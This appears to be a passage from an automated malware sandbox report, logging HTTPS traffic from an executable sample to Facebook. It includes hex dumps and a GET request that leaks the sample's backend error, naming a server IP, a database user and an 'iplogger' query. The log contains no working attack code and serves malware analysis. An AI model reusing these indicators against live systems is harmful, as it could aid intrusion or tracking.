2022-10-07 13:59:28 UTC	862	IN	Data Raw: 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 Data Ascii: 00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520de
2022-10-07 13:59:28 UTC	864	IN	Data Raw: 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 4b 6d 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 34 52 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 4b 6d 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 34 52 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 47 31 22 5d 2c 5b 22 57 Data Ascii: s",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_0_Km","__inst_02182015_0_0_4R"],[{"__m":"__elem_ec77afbd_0_0_Km"},{"__m":"__inst_02182015_0_0_4R"},"en_US",true,"Facebook"]],["__inst_ead1e565_0_0_G1"],["W
2022-10-07 13:59:28 UTC	865	IN	Data Raw: 5d 2c 5b 22 46 6f 63 75 73 4c 69 73 74 65 6e 65 72 22 5d 2c 5b 22 46 6c 69 70 44 69 72 65 63 74 69 6f 6e 4f 6e 4b 65 79 70 72 65 73 73 22 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 34 52 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 62 6c 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 5a 78 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 57 46 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 57 46 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e Data Ascii: ],["FocusListener"],["FlipDirectionOnKeypress"],["PageTransitions"],["__inst_02182015_0_0_4R"],["__inst_e5ad243d_0_0_bl"],["__inst_1de146dc_0_0_Zx"],["CookieAccordion","init",["__elem_a588f507_0_4_WF"],[{"__m":"__elem_a588f507_0_4_WF"},"_9ngb","._9nga",".
2022-10-07 13:59:28 UTC	867	IN	Data Raw: 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 76 2f 6c 2f 30 2c 63 72 6f 73 73 2f 61 65 79 32 41 31 76 59 33 46 6e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73 2f 78 6f 49 6a 5a 4c 33 73 4a 6d 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 Data Ascii: ://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/aey2A1vY3Fn.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/xoIjZL3sJmK.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="http
2022-10-07 13:59:28 UTC	868	IN	Data Raw: 2e 70 68 70 2f 76 33 2f 79 76 2f 72 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 37 79 44 54 42 37 68 53 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 Data Ascii: .php/v3/yv/r/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="7yDTB7hS" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcd
2022-10-07 13:59:28 UTC	870	IN	Data Raw: 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 6d 78 53 6b 66 38 42 22 2c 22 6f 42 2f 79 58 67 33 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 34 42 47 54 6d 43 37 22 2c 22 56 4b 39 6b 6a 61 74 22 2c 22 44 31 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 73 35 2b 44 36 55 4c 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 49 61 52 2f 36 75 50 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 59 74 55 33 43 35 75 22 2c 22 43 47 6b 48 34 46 59 Data Ascii: W4xMH","h3ZzAmG","mxSkf8B","oB/yXg3","dAxX0jj","cYU3c32","4BGTmC7","VK9kjat","D1/JTmT","Z2GjVu9","/rO0lbn","lWOvGTa","s5+D6UL","P/mr5VE","hIwA2W6","diogVau","IaR/6uP","X9nr65a","KsbRs3u","Fn3rAl7","RPLH8jg","zPLgIGT","srPmdt4","R5w1rCJ","YtU3C5u","CGkH4FY
2022-10-07 13:59:28 UTC	871	IN	Data Raw: 43 6f 6e 66 69 67 45 6e 61 62 6c 65 64 3a 66 61 6c 73 65 2c 61 75 78 69 6c 69 61 72 79 53 65 72 76 69 63 65 49 6e 66 6f 3a 7b 7d 2c 74 65 73 74 50 61 74 68 3a 6e 75 6c 6c 2c 6f 72 69 67 69 6e 48 6f 73 74 3a 6e 75 6c 6c 7d 2c 35 33 33 32 5d 2c 5b 22 63 72 3a 31 36 34 32 37 39 37 22 2c 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 2c 22 41 61 32 51 65 38 43 50 57 5a 74 33 55 63 6b 48 73 76 58 6d 59 2d 53 6d 30 45 78 39 35 57 4a 63 53 72 6f 45 31 4c 49 69 71 4b 77 31 6a 7a 53 6f 41 4b 76 55 39 5f 4a 4a 39 53 50 63 6d 6c 76 52 62 73 6a 48 4e 6c 30 42 4b 54 56 39 69 45 76 79 37 70 2d 72 4e 43 4d 2d 5f 68 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e Data Ascii: ConfigEnabled:false,auxiliaryServiceInfo:{},testPath:null,originHost:null},5332],["cr:1642797",["BanzaiBase"],{__rc:["BanzaiBase","Aa2Qe8CPWZt3UckHsvXmY-Sm0Ex95WJcSroE1LIiqKw1jzSoAKvU9_JJ9SPcmlvRbsjHNl0BKTV9iEvy7p-rNCM-_hM"]},-1],["cr:1458113",[],{__rc:[n
2022-10-07 13:59:28 UTC	873	IN	Data Raw: 73 6a 48 4e 6c 30 42 4b 54 56 39 69 45 76 79 37 70 2d 72 4e 43 4d 2d 5f 68 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 32 30 32 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 52 62 6f 47 63 55 78 62 58 69 48 31 56 55 4e 6a 6c 32 57 74 6e 64 76 4a 42 48 30 62 30 48 74 5a 6b 42 4c 39 44 68 6a 34 37 6a 6e 42 4b 6e 61 79 7a 32 4a 6c 68 6a 5a 4c 53 61 41 6d 49 54 30 69 48 49 73 54 52 79 45 6a 4b 6b 53 36 63 6c 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 37 31 34 37 33 22 2c 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 32 51 65 38 43 50 57 5a 74 33 55 63 6b 48 73 76 58 6d 59 2d 53 6d 30 45 78 39 35 57 4a 63 Data Ascii: sjHNl0BKTV9iEvy7p-rNCM-_hM"]},-1],["cr:11202",[],{__rc:[null,"Aa0RboGcUxbXiH1VUNjl2WtndvJBH0b0HtZkBL9Dhj47jnBKnayz2JlhjZLSaAmIT0iHIsTRyEjKkS6clg"]},-1],["cr:971473",["LayerHideOnTransition"],{__rc:["LayerHideOnTransition","Aa2Qe8CPWZt3UckHsvXmY-Sm0Ex95WJc
2022-10-07 13:59:28 UTC	874	IN	Data Raw: 66 69 6c 69 6e 67 22 2c 22 41 61 30 52 62 6f 47 63 55 78 62 58 69 48 31 56 55 4e 6a 6c 32 57 74 6e 64 76 4a 42 48 30 62 30 48 74 5a 6b 42 4c 39 44 68 6a 34 37 6a 6e 42 4b 6e 61 79 7a 32 4a 6c 68 6a 5a 4c 53 61 41 6d 49 54 30 69 48 49 73 54 52 79 45 6a 4b 6b 53 36 63 6c 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 32 36 38 33 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 2c 22 41 61 30 48 55 52 78 76 31 56 6d 5a 4a 46 71 54 58 30 32 54 47 58 4a 37 67 66 0d 0a 31 32 32 36 0d 0a 30 72 76 6c 6f 41 49 55 61 49 48 45 64 78 6f 61 39 2d 77 69 4d 70 46 38 68 33 32 4b 63 66 2d 71 5a 67 6c 63 55 71 46 51 47 50 76 62 45 70 30 51 57 50 42 34 6b 78 6f 35 33 59 6d 39 68 42 69 79 71 33 22 5d 7d 2c 2d 31 5d Data Ascii: filing","Aa0RboGcUxbXiH1VUNjl2WtndvJBH0b0HtZkBL9Dhj47jnBKnayz2JlhjZLSaAmIT0iHIsTRyEjKkS6clg"]},-1],["cr:2683",["warningBlue"],{__rc:["warningBlue","Aa0HURxv1VmZJFqTX02TGXJ7gf12260rvloAIUaIHEdxoa9-wiMpF8h32Kcf-qZglcUqFQGPvbEp0QWPB4kxo53Ym9hBiyq3"]},-1]
2022-10-07 13:59:28 UTC	875	IN	Data Raw: 78 77 30 59 33 67 5a 36 48 69 4e 4d 4c 55 47 39 53 6b 51 72 33 50 59 67 4c 53 5f 67 6c 71 72 53 44 51 64 6b 47 45 31 44 41 53 33 31 6b 78 56 39 48 43 33 79 43 75 4e 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 36 33 34 36 31 36 22 2c 5b 22 55 73 65 72 41 63 74 69 76 69 74 79 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 55 73 65 72 41 63 74 69 76 69 74 79 42 6c 75 65 22 2c 22 41 61 32 51 65 38 43 50 57 5a 74 33 55 63 6b 48 73 76 58 6d 59 2d 53 6d 30 45 78 39 35 57 4a 63 53 72 6f 45 31 4c 49 69 71 4b 77 31 6a 7a 53 6f 41 4b 76 55 39 5f 4a 4a 39 53 50 63 6d 6c 76 52 62 73 6a 48 4e 6c 30 42 4b 54 56 39 69 45 76 79 37 70 2d 72 4e 43 4d 2d 5f 68 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 34 34 31 38 30 22 2c 5b 22 54 69 6d 65 53 70 65 6e 74 49 6d 6d 65 64 69 61 Data Ascii: xw0Y3gZ6HiNMLUG9SkQr3PYgLS_glqrSDQdkGE1DAS31kxV9HC3yCuN"]},-1],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa2Qe8CPWZt3UckHsvXmY-Sm0Ex95WJcSroE1LIiqKw1jzSoAKvU9_JJ9SPcmlvRbsjHNl0BKTV9iEvy7p-rNCM-_hM"]},-1],["cr:844180",["TimeSpentImmedia
2022-10-07 13:59:28 UTC	877	IN	Data Raw: 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 Data Ascii: n%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20passwor
2022-10-07 13:59:28 UTC	878	IN	Data Raw: 6f 35 59 76 4f 32 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 63 59 55 33 63 33 32 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 6e 36 57 34 78 4d 48 22 5d 7d 2c 62 65 3a 31 7d 2c 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6f 6d 6d 6f 6e 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6f 6d 6d 6f 6e 54 79 70 65 73 3a 7b 72 3a 5b 22 59 6b 74 6b 2f 52 55 22 5d 2c 62 65 3a 31 7d 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 68 4b 59 30 51 4b 54 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 2f 6f 35 59 76 4f 32 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d Data Ascii: o5YvO2","dAxX0jj","GDpvtK3","dHsJQ6y","hKY0QKT","BIylKC4","cYU3c32","RPLH8jg","n6W4xMH"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Yktk/RU"],be:1}}}},allResources:["hKY0QKT","8zbEZtu","/o5YvO2","RPLH8jg","n6W4xMH","GpQFBwL","vGt2mxz","h3ZzAm

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49716	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:47 UTC	879	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:47 UTC	880	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: mobkIDXzDXWuCoYj+MGZqVN+/2wIuixCcE4a7dujHooWVQwu2M/eqs34tZd8TUDV9IgEV0WiPgrzwupj9camrg== Date: Fri, 07 Oct 2022 13:59:47 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:47 UTC	881	IN	Data Raw: 31 38 35 65 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 Data Ascii: 185ec<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="9AjGJDy2">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requ
2022-10-07 13:59:47 UTC	882	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 3e 3c 2f 73 74 Data Ascii: (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="9AjGJDy2"></st
2022-10-07 13:59:47 UTC	883	IN	Data Raw: 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c Data Ascii: 8b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><l
2022-10-07 13:59:47 UTC	885	IN	Data Raw: 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 Data Ascii: 2%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886
2022-10-07 13:59:47 UTC	886	IN	Data Raw: 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f Data Ascii: 